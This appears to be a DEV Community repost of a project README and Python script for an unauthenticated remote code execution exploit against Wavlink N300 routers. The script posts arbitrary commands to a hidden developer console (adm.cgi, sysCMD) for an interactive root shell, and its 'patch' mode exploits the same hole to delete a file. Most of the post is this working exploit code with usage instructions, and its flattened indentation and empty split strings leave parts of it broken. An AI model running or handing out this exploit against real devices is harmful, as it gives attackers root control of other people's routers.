DEV Community

Fork
Fork

Posted on

ERAC3000UMNewEMB

#erac3000umnewemb

WLN300-Exploit-and-patch

Wavlink router remote code execution exploit code and patch code. (wavlink n300). This exploit requiers no authentication other than being on the same sub network. The exploit will give RCE with root access.

How to use

python3 Exploit.py 192.168.0.1

Disclouser date

04/06/2018

Requirements

pip install requests
python version 3

How does the exploit works?

The router has a hidden developer console that can be accesssed over port 80, the program will make requests to emulate a shell and allow remote code execution on the target

How does the patch work?

The patch works by exploiting the system and removing the vulnerable file to prevent further exploitation

Warrenty

Use this code at your own risk, this code comes with no warrenty. Never run this code against a wavlink router that you do not own, even the patch.

Contribution

Feel free to contribute as my error testing is not comprehensive
also I have no tested the patch (as this would fix my router and I want to be able to play with other bin files etc on the router)

exploit.py

import requests
import sys
import re

def main():
loop = 0
if len(sys.argv) != 2:
print("[-]Please supply an ip address")
print("[ ]python exploit.py ")
exit(0)
else:
ip = sys.argv[1]

print("[+]Correct number of argv")
print("[+]WAV-LINK (WL-WN529N2) exploit")
print("[ ]This is a demo and should only be used on your own equipment")
print("[ ]Runing this program can brick the router forever, use with caution")

ans = input("[ ]Red team or Blue team?\n[ ]This tool can be used to exploit or patch the router\n[ ]Press 'Y' to exploit or 'n' to patch the device\n") 
while loop == 0:
    if (ans == "y" or ans == "Yes" or ans ==  "Y" or ans == "yes"):
        while(1):
            try:
                command = input("root@" + ip + ":") 
                r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                r2 = requests.get("http://" + ip + "/webcmd.shtml")
                find(r2.text)
            except Exception as e:
                print(e)
                sys.exit(1)

    elif (ans == "n" or ans == "N" or ans == "no" or ans == "No"):
            command = "rm webcmd.shtml"
            try:
                r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                r2 = requests.get("http://" + ip + "/webcmd.shtml")
                print("[ ]Trying to remove developer console")
                print("[+]System patched")
            except Exception as e:
                print(e)
                sys.exit(1)

def find(html):
parsed = html.split('')[1].split('')[0]
print(parsed)

main()

Top comments (0)